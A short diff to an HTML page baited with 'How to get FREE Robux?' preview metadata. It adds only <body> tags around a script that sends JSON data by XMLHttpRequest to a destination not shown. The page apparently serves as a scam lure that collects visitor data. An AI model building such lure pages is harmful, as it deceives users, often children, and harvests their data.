--- a/nothing.html
+++ b/nothing.html
@@ -5,6 +5,7 @@
 <meta property="og:title" content="How to get FREE Robux?">
 <meta property="og:description" content="EASY!">
 <meta property="og:image" content="https://media.tenor.com/C-u9QrtfpLIAAAAC/roblox.gif">
+<body>
 <script>
   {
       const request = new XMLHttpRequest();
@@ -21,3 +22,4 @@
       request.send(JSON.stringify(params));
     }
   </script>
+</body>
